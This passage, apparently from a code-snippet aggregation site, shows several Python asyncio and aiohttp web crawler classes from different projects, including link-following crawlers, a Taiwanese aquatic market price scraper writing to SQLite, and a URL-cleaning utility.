            temp_file.close()

        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.connector = aiohttp.TCPConnector(loop=self.loop)
        self.root_domains = set()
#        for root in roots:
#            parts = urllib.parse.urlparse(root)
#            host, port = urllib.parse.splitport(parts.netloc)
#            if not host:
#                continue
#            if re.match(r'\A[\d\.]*\Z', host):
#                self.root_domains.add(host)
#            else:
##                host = host.lower()
#                if self.strict:
#                    self.root_domains.add(host)
#                else:
#                    self.root_domains.add(lenient_host(host))
#        for root in roots:
#            print("true root")
#            print(root)
#            self.add_url(root)
        self.add_url(roots)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        """Close resources."""
        self.connector.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()
        #Mick - raw HTML page
                #print(text)
                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']?([^\s"'<>]+)''',
                                      text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r',
                                len(urls), response.url)

                for url in urls:

                    #if(url.find("/ibm/console/logon.jsp?action=OK"):
                     #   print("There is a login page")

                    normalized = urllib.parse.urljoin(response.url, url)

#                    path = get_domain(str(normalized))

                    with open(path, 'a') as temp_file:
                        temp_file.write(str(normalized) + ',\n')
                        temp_file.close()

                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from aiohttp.request(
                    'get', url,
                    connector=self.connector,
                    allow_redirects=False,
                    loop=self.loop)
                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)
                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url, client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        if is_redirect(response):
            location = response.headers['location']
            next_url = urllib.parse.urljoin(url, location)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=next_url,
                                                 status=response.status,
                                                 exception=None,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))

            if next_url in self.seen_urls:
                return
            if max_redirect > 0:
                LOGGER.info('redirect to %r from %r', next_url, url)
                self.add_url(next_url, max_redirect - 1)
            else:
                LOGGER.error('redirect limit reached for %r from %r',
                             next_url, url)
        else:
            stat, links = yield from self.parse_links(response)
            self.record_statistic(stat)
            for link in links.difference(self.seen_urls):
                self.q.put_nowait((link, self.max_redirect))
            self.seen_urls.update(links)


    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        while True:
            url, max_redirect = yield from self.q.get()
            assert url in self.seen_urls
            yield from self.fetch(url, max_redirect)
            self.q.task_done()

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)

        #TODO Mick - getting a new URL
        #print("new url: ")
        #print(url)

#        path = get_domain(url)

#        with open(path, 'w') as temp_file:
#            print('writing')
#            temp_file.write('Domain name:')
#            temp_file.write(url)
#            temp_file.write('\n \n')
#            temp_file.close()


        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        print("crawling...")
        """Run the crawler until all finished."""
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        assert self.seen_urls == set(stat.url for stat in self.done)
        self.t1 = time.time()
        for w in workers:
            w.cancel()

Example #14

Show file

class Crawler:
    """Crawl the aquatic market data of a specific date interval.
    """
    def __init__(self,
                 start_date,
                 end_date,
                 max_tasks=10,
                 max_tries=10,
                 loop=None):
        self.start_date = start_date
        self.end_date = end_date
        self.max_tasks = max_tasks
        self.max_tries = max_tries

        self.loop = loop or asyncio.get_event_loop()
        self.session = aiohttp.ClientSession(loop=self.loop)

        self.q = Queue(loop=self.loop)

        self.t0 = time.time()
        self.t1 = None

        self.make_url_queue()

    def add_url(self, url):
        self.q.put_nowait(url)

    def make_url_queue(self):
        dates = dates_gen_fn(self.start_date, self.end_date)
        for date in dates:
            roc_year = int(date.strftime('%Y')) - 1911
            query_date = '{:3d}{}'.format(roc_year,
                                          date.strftime('%m%d')).replace(
                                              ' ', '0')
            url = BASE_URL.format(query_date, query_date)
            self.add_url(url)

    def close(self):
        self.session.close()

    @asyncio.coroutine
    def parse(self, response):
        # print(response)
        if response.status == 200:
            content_type = response.headers.get('content-type')

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            if content_type in ('text/html', 'application/xml'):
                json = yield from response.json(content_type=content_type)
                if json:
                    # print(len(json))
                    for item in json:
                        # print(item)
                        type_name = item['魚貨名稱']
                        type_code = item['品種代碼']
                        market_name = item['市場名稱']
                        high_price = item['上價']
                        low_price = item['下價']
                        mid_price = item['中價']
                        avg_price = item['平均價']
                        date = item['交易日期']
                        trans_amount = item['交易量']

                        sql = '''
                        INSERT INTO {}
                        (type_name, type_code, market_name, high_price, low_price, mid_price, avg_price, date, trans_amount)
                        VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)'''.format(
                            DATABASE_TABLE)
                        cur.execute(sql, (type_name, type_code, market_name,
                                          high_price, low_price, mid_price,
                                          avg_price, date, trans_amount))

                    conn.commit()

        return

    @asyncio.coroutine
    def fetch(self, url):
        """Fetch one URL."""
        tries = 0
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(url,
                                                       allow_redirects=False)

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url,
                            client_error)
                # exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            return

        try:
            yield from self.parse(response)

        finally:
            yield from response.release()

        print('{} done'.format(url))

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while True:
                url = yield from self.q.get()
                yield from self.fetch(url)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        workers = [
            asyncio.Task(self.work(), loop=self.loop)
            for _ in range(self.max_tasks)
        ]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()

        conn.close()

        dt = self.t1 - self.t0
        print('elapsed time: {}'.format(dt))

Example #15

Show file

File: urlcleaner.py Project: DXist/urlcleaner

class URLCleaner:
    """Preprocess and clean urls."""
    def __init__(self, urls, normalizer, result_saver=print,
                 qsize=None, result_qsize=None, num_workers=1,
                 max_tries=4, timeout=3, max_connections=30, *, loop=None):
        """Async URLCleaner.

        :param normalizer: callable that takes url and returns normalized url
        or False when url is invalid or None, when url can't be validated.

        """
        self.urls = urls
        self.normalizer = normalizer
        self.result_saver = result_saver

        self.loop = loop or asyncio.get_event_loop()
        self.q = Queue(maxsize=qsize or num_workers * 10, loop=self.loop)
        self.result_q = Queue(maxsize=result_qsize or num_workers * 10,
                              loop=self.loop)

        self.num_workers = num_workers
        self.max_tries = max_tries
        self.timeout = timeout
        proxy = os.environ.get('http_proxy')
        if proxy:
            self.connector = aiohttp.ProxyConnector(proxy=proxy,
                                                    limit=max_connections,
                                                    loop=self.loop)
        else:
            self.connector = aiohttp.TCPConnector(limit=max_connections,
                                                  loop=self.loop)

        self.t0 = time.time()
        self.t1 = None
        self.clean_task = None

    def local_clean(self, url):
        local_clean_url = self.normalizer(url)
        if local_clean_url:
            status = 'LOCAL_OK'
        elif local_clean_url is False:
            status = 'LOCAL_INVALID'
            local_clean_url = None
        else:
            status = 'UNCLEANED'
        return URLStat(url=url, local_clean_url=local_clean_url,
                       remote_clean_url=None, status=status, http_code=None,
                       exception=None)

    @asyncio.coroutine
    def remote_clean(self, urlstat):
        """Check URL by HEAD probing it."""
        tries = 0
        exception = None
        url = urlstat.local_clean_url
        headers = {
            'Accept-Encoding': 'identity',
        }
        while tries < self.max_tries:
            try:
                response = yield from asyncio.wait_for(
                    aiohttp.request('head', url, allow_redirects=True,
                                    headers=headers,
                                    connector=self.connector, loop=self.loop),
                    self.timeout, loop=self.loop)
                response.close()

                if tries > 1:
                    logger.info('Try %r for %r success', tries, url)
                break

            except ValueError as error:
                # do not need to retry for these errors
                logger.info('For %r raised %s', url, error)
                tries = self.max_tries
                exception = error

            except aiohttp.HttpProcessingError as e:
                logger.error('Got http error for %r, exception %s', url, e)
                urlstat.http_code = e.code
                urlstat.status = 'REMOTE_ERROR'
                urlstat.exception = e
                return urlstat

            except (aiohttp.ClientError, asyncio.TimeoutError) as error:
                logger.info('Try %r for %r raised %s, %s', tries, url,
                            type(error), error)
                exception = error

            tries += 1
            yield from asyncio.sleep(0.1)
        else:
            # all tries failed
            logger.error('all tries for %r failed, exception %s', url,
                         exception)
            urlstat.status = 'REMOTE_ERROR'
            urlstat.exception = exception
            return urlstat

        urlstat.http_code = response.status

        if response.status == 200:
            remote_clean_url = self.normalizer(response.url)
            if remote_clean_url:
                urlstat.status = 'REMOTE_OK'
                urlstat.remote_clean_url = remote_clean_url
            elif remote_clean_url is False:
                urlstat.status = 'REMOTE_INVALID'
            else:
                # url requires authorization, can't clean
                urlstat.status = 'UNCLEANED'
        else:
            urlstat.status = 'REMOTE_INVALID'

        return urlstat

    @asyncio.coroutine
    def process_url(self, url):
        urlstat = self.local_clean(url)
        if urlstat.status == 'LOCAL_OK':
            urlstat = yield from self.remote_clean(urlstat)
        return urlstat

    def close(self):
        """Close resources."""
        self.connector.close()

    @asyncio.coroutine
    def save_results(self):
        """Save cleaned URLStat."""
        while True:
            urlstat = yield from self.result_q.get()
            try:
                self.result_saver(urlstat)
            except StopIteration:
                self.cancel()

            except Exception as e: # noqa
                logger.exception(e)

            self.result_q.task_done()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        while True:
            url = yield from self.q.get()
            urlstat = yield from self.process_url(url)
            self.q.task_done()
            yield from self.result_q.put(urlstat)

    @asyncio.coroutine
    def _clean(self):
        try:
            self.consumer = asyncio.Task(self.save_results(), loop=self.loop)
            self.workers = [asyncio.Task(self.work(), loop=self.loop) for _ in
                            range(self.num_workers)]
            self.t0 = time.time()

            for url in self.urls:
                yield from self.q.put(url)

            yield from self.q.join()
            yield from self.result_q.join()

            self.t1 = time.time()
            logger.debug('Cleaning time %.2f seconds', self.t1 - self.t0)
            self.cancel()

        finally:
            self.close()

    def clean(self):
        """Run the cleaner until all finished."""
        self.clean_task = asyncio.async(self._clean(), loop=self.loop)
        return self.clean_task

    def cancel(self):
        self.consumer.cancel()
        for w in self.workers:
            w.cancel()

        self.clean_task.cancel()

Example #16

Show file

File: crawling.py Project: 83286415/500lines

class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    """
    def __init__(
            self,
            roots,
            exclude=None,
            strict=True,  # What to crawl.
            max_redirect=10,
            max_tries=4,  # Per-url limits.
            max_tasks=10,
            *,
            loop=None):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)  # url执行队列，使用put将url放入队列供爬虫爬取
        self.seen_urls = set()
        self.done = []  # 完成列表，每个元素是访问url后的具名元组FetchStatistic
        self.session = aiohttp.ClientSession(loop=self.loop)  # 单线程IO操作
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(
                root)  # return 6 parts includes netloc(host+port)
            host, port = urllib.parse.splitport(
                parts.netloc)  # www.baidu.com, 80
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):  # 如果url是全数字
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:  # 省略www.
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)  # add url to seen_urls set
        self.t0 = time.time()  # bgn time
        self.t1 = None  # end time

    def close(self):
        """Close resources."""
        self.session.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)  # 带www.
        else:
            return self._host_okay_lenient(host)  # 不带www.

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):  # 这def里的内容好像和现在主流的网页代码不太match，需要使用，需修改
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()  # 返回网页代码的<body>内容

        if response.status == 200:
            content_type = response.headers.get(
                'content-type')  # 只分析头部有content-type的
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))  # 在href中找urls
                if urls:
                    LOGGER.info('got %r distinct urls from %r', len(urls),
                                response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(url=response.url,
                              next_url=None,
                              status=response.status,
                              exception=None,
                              size=len(body),
                              content_type=content_type,
                              encoding=encoding,
                              num_urls=len(links),
                              num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(url,
                                                       allow_redirects=False)
                # session是个单线程IO操作，访问url，返回response。结合@asyncio.coroutine达成多线程异步IO操作

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url,
                            client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries', url, self.max_tries)
            self.record_statistic(
                FetchStatistic(url=url,
                               next_url=None,
                               status=None,
                               exception=exception,
                               size=0,
                               content_type=None,
                               encoding=None,
                               num_urls=0,
                               num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url,
                                                location)  # 是跳转下级连接，需要拼接出完整连接
                self.record_statistic(
                    FetchStatistic(url=url,
                                   next_url=next_url,
                                   status=response.status,
                                   exception=None,
                                   size=0,
                                   content_type=None,
                                   encoding=None,
                                   num_urls=0,
                                   num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    LOGGER.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    LOGGER.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:  # 不是跳转下级，是完整link，则需要分析link，即下一环的协程工作
                stat, links = yield from self.parse_links(
                    response)  # 提取并分析link
                self.record_statistic(stat)
                for link in links.difference(
                        self.seen_urls):  # 在links里，但不在seen_urls里
                    self.q.put_nowait((link, self.max_redirect))  # 放入执行队列
                self.seen_urls.update(links)
        finally:
            yield from response.release()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls  # 如果url不在seen_urls里，则跳进except
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):  # 过滤非法url
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(
                host):  # 过滤那些root url不在roots列表里的，roots列表见crawl.py
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine  # 异步协程：爬取执行到yield from时并不会停止等待，而是立刻执行loop中的下一个爬取crawl函数
    def crawl(self):
        """Run the crawler until all finished."""
        workers = [
            asyncio.Task(self.work(), loop=self.loop)
            for _ in range(self.max_tasks)
        ]  # 创建100个workers的list，其中每个work就是一个task(thread)
        self.t0 = time.time()
        yield from self.q.join()  # 等待所有线程worker完成工作
        # yield from 解释见： https://www.cnblogs.com/wongbingming/p/9085268.html
        # 每个耗时的动作都编写一个@asyncio.coroutine下的def，然后在这个def内用yield from连接另外一个耗时的同candy的def
        self.t1 = time.time()
        for w in workers:
            w.cancel()  # cancel this task

Example #17

Show file

File: crawling.py Project: zzkhaz/aspider

class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    """

    def __init__(self, roots,
                 # What to crawl.
                 exclude=None, include=None, output=None, strict=True, count=None,
                 proxy=None, max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, loop=None, no_parse_links=False):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.include = include
        self.output = output
        self.count = int(count) if count else None
        self.strict = strict
        self.proxy = proxy
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.task_exit_counter = 0
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        self.no_parse_links = no_parse_links
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None
        self.output_file = self.get_file()

    @asyncio.coroutine
    def close(self):
        """Close resources."""
        yield from self.session.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    def parse_text(self, url, text):
        '''
        call callback func on route
        '''
        route, args = router.match(url)
        if route:
            route.call(text, **args)

    @asyncio.coroutine
    def parse_links(self, response):
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text(errors='ignore')

                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))
                if urls:
                    logger.debug('got %r distinct urls from %r',
                                 len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(str(response.url), url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

                # parse text
                self.parse_text(str(response.url), text)

                # do outing
                self.handle_output(str(response.url), text)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    def handle_output(self, url, text):
        if self.output:
            d = self.parse_output(url, text)
            logger.info(f'write item: {url}')
            outputing.do_write(self.output, d, self.output_file)

    def parse_output(self, url, text):
        html = HTML(html=text)
        title_ele = html.find('title', first=True)
        d = OrderedDict()
        d['title'] = title_ele.text
        d['url'] = url
        d['datetime'] = now_time()
        d['text'] = text
        return d

    def get_file(self):
        '''
        generate a file name for output
        '''
        domains = list(self.root_domains)
        dt = datetime.datetime.now()
        dt_str = dt.strftime('%Y-%m-%d %H:%M:%S')
        f_name = f'{domains[0]}-{dt_str}'
        if self.output:
            if self.output == 'stream':
                return None
            f_name += f'.{self.output}'
        return f_name

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(
                    url, allow_redirects=False, proxy=self.proxy)

                if tries > 1:
                    logger.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                logger.info('try %r for %r raised %r',
                            tries, url, client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            logger.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(FetchStatistic(url=url,
                                                     next_url=next_url,
                                                     status=response.status,
                                                     exception=None,
                                                     size=0,
                                                     content_type=None,
                                                     encoding=None,
                                                     num_urls=0,
                                                     num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    logger.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    logger.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                # disable parse links
                if not self.no_parse_links:
                    for link in links.difference(self.seen_urls):
                        # use router to verify links
                        if self.verify_url(link) or router.verify_url(link, url):
                            self.q.put_nowait((link, self.max_redirect))
                    self.seen_urls.update(links)
        except Exception as ex:
            logger.error(f'parse error: {url}')
            logger.exception(ex)
        finally:
            yield from asyncio.sleep(1)
            yield from response.release()

    @asyncio.coroutine
    def exit_on_empty_queue(self):
        if self.count and len(self.done) >= self.count:
            logger.warning(f'reach count: {self.count}, now quit')
            router.stop()

        if self.q.qsize() == 0:
            logger.warning('empty queue, now quit')
            yield from self.q.join()
            router.stop()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while router.is_running():
                url, max_redirect = yield from self.q.get()
                logger.debug(f'work on url {url}')
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
                yield from self.exit_on_empty_queue()

        except asyncio.CancelledError:
            logger.warning('canceling the worker')

    def url_allowed(self, url):
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            # logger.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            # logger.debug('skipping non-root host in %r', url)
            return False
        return True

    def verify_url(self, url):
        if self.include:
            for pattern in self.include:
                if re.search(pattern, url):
                    logger.debug(
                        f'{url} match include pattern: {pattern}, allowed')
                    return True
        if self.exclude and re.search(self.exclude, url):
            logger.debug(
                f'{url} match exclude pattern: {self.exclude}, rejected')
            return False
        # default False
        return False

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        logger.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        try:
            workers = [asyncio.Task(self.work(), loop=self.loop)
                       for _ in range(self.max_tasks)]
            self.t0 = time.time()
            # yield from asyncio.gather(*workers, loop=self.loop, return_exceptions=True)
            yield from router.quit_event.wait()
            for w in workers:
                w.cancel()
            self.t1 = time.time()
        except asyncio.CancelledError:
            logger.warning('canceling the crawler')
        finally:
            logger.warning('closing the crawler')
            yield from self.close()

Example #18

Show file

File: asyncio_crawler.py Project: Dustyposa/goSpider

class Crawler:
    def __init__(self, root_url: str, max_redirect: int):
        self.max_tasks = 10
        self.max_redirect = max_redirect
        self.q = Queue()
        self.seen_urls = set()

        # aiohttp 的 ClientSession 执行连接池 并且 HTTP 为我们 keep-alive
        self.session = aiohttp.ClientSession(loop=loop)

        # 把 (URL, max_redirect) 放入队列
        self.q.put((root_url, self.max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """运行 crawler 直到所有的工作完成"""
        wokers = [asyncio.Task(self.work())
                  for _ in range(self.max_tasks)]

        # 当所有任务完成，退出
        yield from self.q.join()
        for w in wokers:
            w.cancel()

    @asyncio.coroutine
    def work(self):
        while True:
            url, max_redirect = yield from self.q.get()

            # 下载页面并向 self.q 中增加新链接
            yield from self.fetch(url, max_redirect)
            self.q.task_done()

    @asyncio.coroutine
    def fetch(self, url: str, max_redirect: int):
        # 我们自己处理 redirects
        response = yield from self.session.get(
            url, allow_redirects=False
        )

        try:
            if is_redirect(response):
                if max_redirect > 0:
                    next_url = response.headers['location']
                    if next_url in self.seen_urls:
                        # 我们已经下载过这个路径
                        return

                # 记录我们已经看过这条连接
                self.seen_urls.add(next_url)

                # 跟进重定向，重定向次数减一
                self.q.put_nowait((next_url, max_redirect - 1))
            else:
                links = yield from self.parse_links(response)
                # python集合逻辑
                for link in links.dirrerence(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            # 返回连接池
            yield from response.release()

Example #19

Show file

File: Spider.py Project: wuxiongwei/cl_spider

class Spider:
    def __init__(self,
                 max_tries=30,
                 max_tasks=10,
                 timeout=5,
                 rootDir=os.getcwd()):
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.loop = asyncio.get_event_loop()
        self.q = Queue(loop=self.loop)
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.timeout = timeout
        self.rootDir = rootDir

    def close(self):
        self.session.close()

    def append_request(self, request):
        self.q.put_nowait(request)

    @asyncio.coroutine
    def _get_request(self):
        r = yield from self.q.get()
        return r

    @asyncio.coroutine
    def fetch(self, request_type, url, params, data):
        """Fetch one URL"""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                print("try %s---->%d times" % (url, tries))
                with aiohttp.Timeout(self.timeout):
                    response = yield from self.session.get(url, params=params)
                    if response.status == 200:
